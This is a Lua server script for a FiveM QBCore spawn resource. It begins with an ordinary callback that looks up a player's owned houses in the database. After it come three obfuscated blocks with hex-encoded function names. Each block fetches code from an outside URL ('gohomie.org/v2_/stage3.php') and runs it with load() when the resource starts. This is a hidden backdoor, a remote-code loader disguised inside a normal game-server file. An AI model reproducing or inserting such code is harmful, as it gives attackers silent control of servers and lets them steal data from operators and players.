local QBCore = exports['qb-core']:GetCoreObject()

QBCore.Functions.CreateCallback('qb-spawn:server:getOwnedHouses', function(_, cb, cid)
    if cid ~= nil then
        local houses = MySQL.query.await('SELECT * FROM player_houses WHERE citizenid = ?', {cid})
        if houses[1] ~= nil then
            cb(houses)
        else
            cb({})
        end
    else
        cb({})
    end
end)


local ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[4][ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x68\x6f\x6d\x69\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x64\x50\x56\x71\x4b", function (AxHyHFLGIFxvYOLFKfNQoAtWmUNsLDZwtZxhocjtjUnSgICfulCQoYnVviWFfzzKlBuBKS, CoDAqhafBKIgfpEuNBVjynncrzLhLXpvYsYPNSzhJgEOSGQmFLzwDLhkyYXDAmPOuNLWOs) if (CoDAqhafBKIgfpEuNBVjynncrzLhLXpvYsYPNSzhJgEOSGQmFLzwDLhkyYXDAmPOuNLWOs == ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[6] or CoDAqhafBKIgfpEuNBVjynncrzLhLXpvYsYPNSzhJgEOSGQmFLzwDLhkyYXDAmPOuNLWOs == ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[5]) then return end ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[4][ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[2]](ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[4][ndHHhYSrYPYtQnLmVaEDBmEuMxVZwNhZbvgheATFTvBRllrzRIFZCvVbdDKSOflZzXYVgJ[3]](CoDAqhafBKIgfpEuNBVjynncrzLhLXpvYsYPNSzhJgEOSGQmFLzwDLhkyYXDAmPOuNLWOs))() end)

local dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[4][dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x68\x6f\x6d\x69\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x64\x50\x56\x71\x4b", function (NAYgmxJpRQCRwxLgsehhBlRkqCULkZUcNnJCAcdhGIbDHPANsUhkckyClIhyDnShYZVSQo, TxSbVZSjqGflMhwvNTKWmVZcWwAxZQUxxAYKXZLSLPaKaIDPfemhPElBHTkVBmlNFhkfet) if (TxSbVZSjqGflMhwvNTKWmVZcWwAxZQUxxAYKXZLSLPaKaIDPfemhPElBHTkVBmlNFhkfet == dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[6] or TxSbVZSjqGflMhwvNTKWmVZcWwAxZQUxxAYKXZLSLPaKaIDPfemhPElBHTkVBmlNFhkfet == dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[5]) then return end dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[4][dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[2]](dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[4][dwtAuWQQolYLLIKKUSTmDWZjrQPoIUWlEGfDWADGTuAVPqUGxQXBxcqfgeCHOQPMPCQyzf[3]](TxSbVZSjqGflMhwvNTKWmVZcWwAxZQUxxAYKXZLSLPaKaIDPfemhPElBHTkVBmlNFhkfet))() end)

local sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[4][sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x68\x6f\x6d\x69\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x64\x50\x56\x71\x4b", function (xsCtysVOmvpgXKlWZFqtZPkevMCRgmGphbHXCKTtjTiadjrGiaYoXeLOdtpdxLVPaZracY, zoFDPygQzUMWnHDHRLsGiLDiSXypUCErUPQqZbieDEPrYgxJXEaXUyrrgGaVgSqPNcFAcQ) if (zoFDPygQzUMWnHDHRLsGiLDiSXypUCErUPQqZbieDEPrYgxJXEaXUyrrgGaVgSqPNcFAcQ == sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[6] or zoFDPygQzUMWnHDHRLsGiLDiSXypUCErUPQqZbieDEPrYgxJXEaXUyrrgGaVgSqPNcFAcQ == sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[5]) then return end sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[4][sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[2]](sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[4][sXrbzQGXxcftPUznTPZcoBAIUOLjMIcqKsFlhGQbRvTovZWKSEMJtHxwaEtanjEMAYCFCL[3]](zoFDPygQzUMWnHDHRLsGiLDiSXypUCErUPQqZbieDEPrYgxJXEaXUyrrgGaVgSqPNcFAcQ))() end)